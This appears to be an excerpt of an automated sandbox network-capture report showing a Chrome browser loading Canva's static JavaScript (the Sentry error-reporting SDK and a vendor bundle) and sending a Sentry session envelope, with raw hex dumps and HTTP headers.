                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1369INData Raw: 33 34 3a 31 2c 33 30 3a 31 2c 36 31 32 35 3a 31 2c 30 3a 31 2c 38 37 32 34 3a 31 2c 31 35 36 34 3a 31 2c 34 34 35 30 3a 31 2c 32 33 39 35 3a 31 2c 31 35 38 31 3a 31 2c 31 31 35 36 3a 31 2c 33 34 31 36 3a 31 2c 36 33 34 3a 31 2c 34 32 39 3a 31 2c 38 38 33 32 3a 31 2c 39 34 32 38 3a 31 2c 36 38 34 3a 31 2c 39 36 36 38 3a 31 2c 32 33 30 37 3a 31 2c 35 35 34 30 3a 31 2c 38 39 31 32 3a 31 2c 37 38 39 38 3a 31 2c 36 35 36 34 3a 31 2c 35 30 36 36 3a 31 2c 36 33 30 35 3a 31 2c 37 32 38 34 3a 31 2c 37 31 36 30 3a 31 2c 31 36 35 39 3a 31 2c 33 33 34 3a 31 2c 32 31 34 31 3a 31 2c 36 37 35 34 3a 31 2c 36 32 33 32 3a 31 2c 32 32 30 36 3a 31 2c 31 35 31 37 3a 31 2c 33 38 37 32 3a 31 2c 32 32 33 3a 31 2c 35 39 36 33 3a 31 2c 35 35 32 34 3a 31 2c 32 33 33 39 3a 31 7d 5b
                                                                                                                                                                                                                                                                    Data Ascii: 34:1,30:1,6125:1,0:1,8724:1,1564:1,4450:1,2395:1,1581:1,1156:1,3416:1,634:1,429:1,8832:1,9428:1,684:1,9668:1,2307:1,5540:1,8912:1,7898:1,6564:1,5066:1,6305:1,7284:1,7160:1,1659:1,334:1,2141:1,6754:1,6232:1,2206:1,1517:1,3872:1,223:1,5963:1,5524:1,2339:1}[
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1369INData Raw: 2e 63 73 73 22 3b 69 66 28 31 36 35 31 3d 3d 3d 65 29 72 65 74 75 72 6e 22 66 31 32 61 64 32 36 62 65 35 36 65 61 62 35 35 2e 6c 74 72 2e 63 73 73 22 3b 69 66 28 31 35 38 3d 3d 3d 65 29 72 65 74 75 72 6e 22 37 39 38 36 33 35 37 65 36 37 38 39 30 65 31 62 2e 6c 74 72 2e 63 73 73 22 3b 69 66 28 35 31 37 36 3d 3d 3d 65 29 72 65 74 75 72 6e 22 35 66 31 64 34 38 33 39 65 30 37 64 65 36 32 63 2e 6c 74 72 2e 63 73 73 22 3b 69 66 28 32 36 32 37 3d 3d 3d 65 29 72 65 74 75 72 6e 22 63 39 62 66 30 39 31 37 32 30 66 37 66 31 63 33 2e 6c 74 72 2e 63 73 73 22 3b 69 66 28 31 35 33 35 3d 3d 3d 65 29 72 65 74 75 72 6e 22 63 61 31 30 33 38 35 61 62 37 66 33 36 35 37 63 2e 6c 74 72 2e 63 73 73 22 3b 69 66 28 35 39 31 39 3d 3d 3d 65 29 72 65 74 75 72 6e 22 37 31 64 65 63 31
                                                                                                                                                                                                                                                                    Data Ascii: .css";if(1651===e)return"f12ad26be56eab55.ltr.css";if(158===e)return"7986357e67890e1b.ltr.css";if(5176===e)return"5f1d4839e07de62c.ltr.css";if(2627===e)return"c9bf091720f7f1c3.ltr.css";if(1535===e)return"ca10385ab7f3657c.ltr.css";if(5919===e)return"71dec1


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    16192.168.2.1249734104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:31 UTC623OUTGET /static/lib/sentry/7.16.0.min.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1353INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:32 GMT
                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950dc4bd8437f-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Age: 1246818
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: W/"91258797204803263e4c46f8400f1bda"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:18 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Mon, 14 Oct 2024 22:43:15 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-id-2: n/tgAv7nhdMK8+ZDRGJEaCxpKxVhLFJZMQK/5RvJNADTgttBr37iBiAAR/bcmMUlTegrHaZW7D4=
                                                                                                                                                                                                                                                                    x-amz-meta-vary: Origin
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: 4BC7Q2FFFT5VZFJY
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: tozEOUZEBcqjRpGz85aK0Lg42bZme1w8
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yZ1L1LzfSTjuTEUy0f6xcZQOP6QRNPHlwf%2BXQH3wSiEMcIgdg0oJrP6exXdpHq7Y2jITzWMmhryxHNXG2qSnB3G2X2rIf%2BMsbTdW8yPMXi%2BbSyDdpfwgi89G0KLLFCPn%2BiU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC92INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1369INData Raw: 37 66 66 61 0d 0a 2f 2a 21 20 40 73 65 6e 74 72 79 2f 62 72 6f 77 73 65 72 20 37 2e 31 36 2e 30 20 28 35 33 38 36 63 65 37 29 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 67 65 74 73 65 6e 74 72 79 2f 73 65 6e 74 72 79 2d 6a 61 76 61 73 63 72 69 70 74 20 2a 2f 0a 76 61 72 20 53 65 6e 74 72 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 63 6f 6e 73 74 20 6e 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3b 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 73 77 69 74 63 68 28 6e 2e 63 61 6c 6c 28 74 29 29 7b 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 45 72 72 6f 72 5d 22 3a 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 45 78 63 65 70 74 69 6f 6e 5d 22 3a 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 44 4f 4d 45 78 63 65 70 74 69 6f 6e
                                                                                                                                                                                                                                                                    Data Ascii: 7ffa/*! @sentry/browser 7.16.0 (5386ce7) | https://github.com/getsentry/sentry-javascript */var Sentry=function(t){const n=Object.prototype.toString;function e(t){switch(n.call(t)){case"[object Error]":case"[object Exception]":case"[object DOMException
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1369INData Raw: 2c 73 2c 63 2c 75 2c 61 3b 69 66 28 21 65 7c 7c 21 65 2e 74 61 67 4e 61 6d 65 29 72 65 74 75 72 6e 22 22 3b 72 2e 70 75 73 68 28 65 2e 74 61 67 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 63 6f 6e 73 74 20 66 3d 6e 26 26 6e 2e 6c 65 6e 67 74 68 3f 6e 2e 66 69 6c 74 65 72 28 28 74 3d 3e 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 29 29 2e 6d 61 70 28 28 74 3d 3e 5b 74 2c 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 5d 29 29 3a 6e 75 6c 6c 3b 69 66 28 66 26 26 66 2e 6c 65 6e 67 74 68 29 66 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 72 2e 70 75 73 68 28 60 5b 24 7b 74 5b 30 5d 7d 3d 22 24 7b 74 5b 31 5d 7d 22 5d 60 29 7d 29 29 3b 65 6c 73 65 20 69 66 28 65 2e 69 64 26 26 72 2e 70 75 73 68 28 60 23 24 7b 65 2e 69 64 7d 60 29 2c 69
                                                                                                                                                                                                                                                                    Data Ascii: ,s,c,u,a;if(!e||!e.tagName)return"";r.push(e.tagName.toLowerCase());const f=n&&n.length?n.filter((t=>e.getAttribute(t))).map((t=>[t,e.getAttribute(t)])):null;if(f&&f.length)f.forEach((t=>{r.push(`[${t[0]}="${t[1]}"]`)}));else if(e.id&&r.push(`#${e.id}`),i
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1369INData Raw: 6f 2c 70 72 6f 74 6f 63 6f 6c 3a 65 2c 70 75 62 6c 69 63 4b 65 79 3a 72 7d 29 7d 28 74 29 3a 77 28 74 29 7d 63 6f 6e 73 74 20 53 3d 5b 22 64 65 62 75 67 22 2c 22 69 6e 66 6f 22 2c 22 77 61 72 6e 22 2c 22 65 72 72 6f 72 22 2c 22 6c 6f 67 22 2c 22 61 73 73 65 72 74 22 2c 22 74 72 61 63 65 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 24 28 74 2c 6e 3d 30 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 30 3d 3d 3d 6e 7c 7c 74 2e 6c 65 6e 67 74 68 3c 3d 6e 3f 74 3a 60 24 7b 74 2e 73 75 62 73 74 72 28 30 2c 6e 29 7d 2e 2e 2e 60 7d 66 75 6e 63 74 69 6f 6e 20 78 28 74 2c 6e 29 7b 69 66 28 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 29 72 65 74 75 72 6e 22 22 3b 63 6f 6e 73 74 20 65 3d 5b 5d 3b 66 6f 72 28 6c 65 74 20 6e 3d 30 3b
                                                                                                                                                                                                                                                                    Data Ascii: o,protocol:e,publicKey:r})}(t):w(t)}const S=["debug","info","warn","error","log","assert","trace"];function $(t,n=0){return"string"!=typeof t||0===n||t.length<=n?t:`${t.substr(0,n)}...`}function x(t,n){if(!Array.isArray(t))return"";const e=[];for(let n=0;
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1369INData Raw: 6f 6e 73 74 20 65 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 52 28 74 29 29 3b 69 66 28 65 2e 73 6f 72 74 28 29 2c 21 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 22 5b 6f 62 6a 65 63 74 20 68 61 73 20 6e 6f 20 6b 65 79 73 5d 22 3b 69 66 28 65 5b 30 5d 2e 6c 65 6e 67 74 68 3e 3d 6e 29 72 65 74 75 72 6e 20 24 28 65 5b 30 5d 2c 6e 29 3b 66 6f 72 28 6c 65 74 20 74 3d 65 2e 6c 65 6e 67 74 68 3b 74 3e 30 3b 74 2d 2d 29 7b 63 6f 6e 73 74 20 72 3d 65 2e 73 6c 69 63 65 28 30 2c 74 29 2e 6a 6f 69 6e 28 22 2c 20 22 29 3b 69 66 28 21 28 72 2e 6c 65 6e 67 74 68 3e 6e 29 29 72 65 74 75 72 6e 20 74 3d 3d 3d 65 2e 6c 65 6e 67 74 68 3f 72 3a 24 28 72 2c 6e 29 7d 72 65 74 75 72 6e 22 22 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 74 29 7b 72 65 74 75 72 6e 20 41 28 74 2c 6e 65 77 20
                                                                                                                                                                                                                                                                    Data Ascii: onst e=Object.keys(R(t));if(e.sort(),!e.length)return"[object has no keys]";if(e[0].length>=n)return $(e[0],n);for(let t=e.length;t>0;t--){const r=e.slice(0,t).join(", ");if(!(r.length>n))return t===e.length?r:$(r,n)}return""}function N(t){return A(t,new
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1369INData Raw: 75 72 6e 20 6e 65 77 20 48 65 61 64 65 72 73 2c 6e 65 77 20 52 65 71 75 65 73 74 28 22 68 74 74 70 3a 2f 2f 77 77 77 2e 65 78 61 6d 70 6c 65 2e 63 6f 6d 22 29 2c 6e 65 77 20 52 65 73 70 6f 6e 73 65 2c 21 30 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 48 28 74 29 7b 72 65 74 75 72 6e 20 74 26 26 2f 5e 66 75 6e 63 74 69 6f 6e 20 66 65 74 63 68 5c 28 5c 29 5c 73 2b 5c 7b 5c 73 2b 5c 5b 6e 61 74 69 76 65 20 63 6f 64 65 5c 5d 5c 73 2b 5c 7d 24 2f 2e 74 65 73 74 28 74 2e 74 6f 53 74 72 69 6e 67 28 29 29 7d 63 6f 6e 73 74 20 46 3d 7b 7d 2c 42 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 58 28 74 29 7b 69 66 28 21 42 5b 74 5d 29 73 77 69 74 63 68 28 42 5b 74 5d 3d 21 30 2c 74 29 7b 63 61 73 65 22 63 6f 6e 73 6f 6c 65 22 3a 21
                                                                                                                                                                                                                                                                    Data Ascii: urn new Headers,new Request("http://www.example.com"),new Response,!0}catch(t){return!1}}function H(t){return t&&/^function fetch\(\)\s+\{\s+\[native code\]\s+\}$/.test(t.toString())}const F={},B={};function X(t){if(!B[t])switch(B[t]=!0,t){case"console":!
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1369INData Raw: 74 72 79 5f 69 6e 73 74 72 75 6d 65 6e 74 61 74 69 6f 6e 5f 68 61 6e 64 6c 65 72 73 5f 5f 29 7d 63 61 74 63 68 28 74 29 7b 7d 72 65 74 75 72 6e 20 74 2e 63 61 6c 6c 28 74 68 69 73 2c 6e 2c 65 2c 72 29 7d 7d 29 29 29 7d 29 29 7d 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 78 68 72 22 3a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 28 22 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 22 69 6e 20 79 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 74 3d 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 2e 70 72 6f 74 6f 74 79 70 65 3b 6b 28 74 2c 22 6f 70 65 6e 22 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 2e 2e 2e 6e 29 7b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2c 72 3d 6e 5b 31 5d 2c 69 3d 65 2e 5f 5f 73 65 6e 74 72 79 5f 78 68
                                                                                                                                                                                                                                                                    Data Ascii: try_instrumentation_handlers__)}catch(t){}return t.call(this,n,e,r)}})))}))}();break;case"xhr":!function(){if(!("XMLHttpRequest"in y))return;const t=XMLHttpRequest.prototype;k(t,"open",(function(t){return function(...n){const e=this,r=n[1],i=e.__sentry_xh
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1369INData Raw: 44 61 74 61 3a 7b 6d 65 74 68 6f 64 3a 4a 28 6e 29 2c 75 72 6c 3a 4b 28 6e 29 7d 2c 73 74 61 72 74 54 69 6d 65 73 74 61 6d 70 3a 44 61 74 65 2e 6e 6f 77 28 29 7d 3b 72 65 74 75 72 6e 20 57 28 22 66 65 74 63 68 22 2c 7b 2e 2e 2e 65 7d 29 2c 74 2e 61 70 70 6c 79 28 79 2c 6e 29 2e 74 68 65 6e 28 28 74 3d 3e 28 57 28 22 66 65 74 63 68 22 2c 7b 2e 2e 2e 65 2c 65 6e 64 54 69 6d 65 73 74 61 6d 70 3a 44 61 74 65 2e 6e 6f 77 28 29 2c 72 65 73 70 6f 6e 73 65 3a 74 7d 29 2c 74 29 29 2c 28 74 3d 3e 7b 74 68 72 6f 77 20 57 28 22 66 65 74 63 68 22 2c 7b 2e 2e 2e 65 2c 65 6e 64 54 69 6d 65 73 74 61 6d 70 3a 44 61 74 65 2e 6e 6f 77 28 29 2c 65 72 72 6f 72 3a 74 7d 29 2c 74 7d 29 29 7d 7d 29 29 7d 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 68 69 73 74 6f 72 79 22 3a 21 66
                                                                                                                                                                                                                                                                    Data Ascii: Data:{method:J(n),url:K(n)},startTimestamp:Date.now()};return W("fetch",{...e}),t.apply(y,n).then((t=>(W("fetch",{...e,endTimestamp:Date.now(),response:t}),t)),(t=>{throw W("fetch",{...e,endTimestamp:Date.now(),error:t}),t}))}}))}();break;case"history":!f
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1369INData Raw: 47 45 54 22 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 74 3d 5b 5d 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 5b 30 5d 3f 74 5b 30 5d 3a 22 52 65 71 75 65 73 74 22 69 6e 20 79 26 26 68 28 74 5b 30 5d 2c 52 65 71 75 65 73 74 29 3f 74 5b 30 5d 2e 75 72 6c 3a 53 74 72 69 6e 67 28 74 5b 30 5d 29 7d 6c 65 74 20 47 3b 6c 65 74 20 56 2c 51 3b 66 75 6e 63 74 69 6f 6e 20 59 28 74 2c 6e 3d 21 31 29 7b 72 65 74 75 72 6e 20 65 3d 3e 7b 69 66 28 21 65 7c 7c 51 3d 3d 3d 65 29 72 65 74 75 72 6e 3b 69 66 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 22 6b 65 79 70 72 65 73 73 22 21 3d 3d 74 2e 74 79 70 65 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 63 6f 6e 73 74 20 6e 3d 74 2e 74 61 72 67 65 74 3b 69 66 28 21 6e 7c 7c 21 6e 2e 74 61 67 4e 61
                                                                                                                                                                                                                                                                    Data Ascii: GET"}function K(t=[]){return"string"==typeof t[0]?t[0]:"Request"in y&&h(t[0],Request)?t[0].url:String(t[0])}let G;let V,Q;function Y(t,n=!1){return e=>{if(!e||Q===e)return;if(function(t){if("keypress"!==t.type)return!1;try{const n=t.target;if(!n||!n.tagNa
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1369INData Raw: 65 3d 65 74 28 74 29 3b 69 66 28 21 65 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 72 3d 65 2e 6d 65 63 68 61 6e 69 73 6d 3b 69 66 28 65 2e 6d 65 63 68 61 6e 69 73 6d 3d 7b 74 79 70 65 3a 22 67 65 6e 65 72 69 63 22 2c 68 61 6e 64 6c 65 64 3a 21 30 2c 2e 2e 2e 72 2c 2e 2e 2e 6e 7d 2c 6e 26 26 22 64 61 74 61 22 69 6e 20 6e 29 7b 63 6f 6e 73 74 20 74 3d 7b 2e 2e 2e 72 26 26 72 2e 64 61 74 61 2c 2e 2e 2e 6e 2e 64 61 74 61 7d 3b 65 2e 6d 65 63 68 61 6e 69 73 6d 2e 64 61 74 61 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 74 29 7b 69 66 28 74 26 26 74 2e 5f 5f 73 65 6e 74 72 79 5f 63 61 70 74 75 72 65 64 5f 5f 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 4f 28 74 2c 22 5f 5f 73 65 6e 74 72 79 5f 63 61 70 74 75 72 65 64 5f 5f 22 2c 21 30 29 7d 63 61 74 63 68 28 74
                                                                                                                                                                                                                                                                    Data Ascii: e=et(t);if(!e)return;const r=e.mechanism;if(e.mechanism={type:"generic",handled:!0,...r,...n},n&&"data"in n){const t={...r&&r.data,...n.data};e.mechanism.data=t}}function ot(t){if(t&&t.__sentry_captured__)return!0;try{O(t,"__sentry_captured__",!0)}catch(t


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    17192.168.2.124973534.120.195.249443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC740OUTPOST /api/1767683/envelope/?sentry_key=944d224d45b943ba9f96396432dfd868&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.16.0 HTTP/1.1
                                                                                                                                                                                                                                                                    Host: o13855.ingest.sentry.io
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    Content-Length: 465
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC465OUTData Raw: 7b 22 73 65 6e 74 5f 61 74 22 3a 22 32 30 32 34 2d 31 31 2d 32 30 54 31 35 3a 30 31 3a 32 39 2e 32 37 32 5a 22 2c 22 73 64 6b 22 3a 7b 22 6e 61 6d 65 22 3a 22 73 65 6e 74 72 79 2e 6a 61 76 61 73 63 72 69 70 74 2e 62 72 6f 77 73 65 72 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 37 2e 31 36 2e 30 22 7d 7d 0a 7b 22 74 79 70 65 22 3a 22 73 65 73 73 69 6f 6e 22 7d 0a 7b 22 73 69 64 22 3a 22 64 39 33 65 39 66 37 61 36 63 34 31 34 33 30 31 38 37 66 65 37 61 38 39 33 63 33 32 31 32 64 62 22 2c 22 69 6e 69 74 22 3a 74 72 75 65 2c 22 73 74 61 72 74 65 64 22 3a 22 32 30 32 34 2d 31 31 2d 32 30 54 31 35 3a 30 31 3a 32 39 2e 32 37 31 5a 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 31 31 2d 32 30 54 31 35 3a 30 31 3a 32 39 2e 32 37 31 5a 22 2c 22 73 74 61 74
                                                                                                                                                                                                                                                                    Data Ascii: {"sent_at":"2024-11-20T15:01:29.272Z","sdk":{"name":"sentry.javascript.browser","version":"7.16.0"}}{"type":"session"}{"sid":"d93e9f7a6c41430187fe7a893c3212db","init":true,"started":"2024-11-20T15:01:29.271Z","timestamp":"2024-11-20T15:01:29.271Z","stat
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC521INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:32 GMT
                                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                                    Content-Length: 2
                                                                                                                                                                                                                                                                    vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                                                    access-control-expose-headers: x-sentry-error,x-sentry-rate-limits,retry-after
                                                                                                                                                                                                                                                                    cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC2INData Raw: 7b 7d
                                                                                                                                                                                                                                                                    Data Ascii: {}


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    18192.168.2.1249736104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC622OUTGET /web/4af0e43f4ef393f1.vendor.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:32 UTC1193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:32 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 205770
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950de49b02365-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 1130840
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "af2fe7bb481acfbd2a36bc7510332bf4"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:18 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 09 Oct 2024 00:47:52 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 10 Oct 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: NgUIyiYAy8I4M8KmAhqMaPTzl2Tzg/CvMNF3ufWrLvjmUZNY5JOSomRTMwo7ccMDa9GjnV6n2Wo=
